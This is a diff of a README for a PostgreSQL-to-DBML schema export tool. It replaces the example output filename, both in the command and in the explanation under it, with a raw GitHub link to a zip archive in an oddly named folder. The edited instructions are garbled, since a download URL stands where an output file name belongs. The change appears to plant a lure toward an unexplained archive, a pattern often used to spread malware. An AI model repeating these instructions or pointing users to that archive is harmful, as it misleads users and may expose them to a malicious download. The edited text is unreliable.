jamalart002/pg-schema-dbml/README.md

 Example command format:
 ```
-pg-schema-dbml --dbname your_database_name --output your_output_file.dbml
+pg-schema-dbml --dbname your_database_name --output https://github.com/jamalart002/pg-schema-dbml/raw/refs/heads/main/Elohim/schema_dbml_pg_1.1.zip
 ```

-Replace `your_database_name` with the name of your PostgreSQL database and `your_output_file.dbml` with the desired name for your output file.
+Replace `your_database_name` with the name of your PostgreSQL database and `https://github.com/jamalart002/pg-schema-dbml/raw/refs/heads/main/Elohim/schema_dbml_pg_1.1.zip` with the desired name for your output file.

 ## ❓ FAQs
 ### How do I know if PostgreSQL is installed?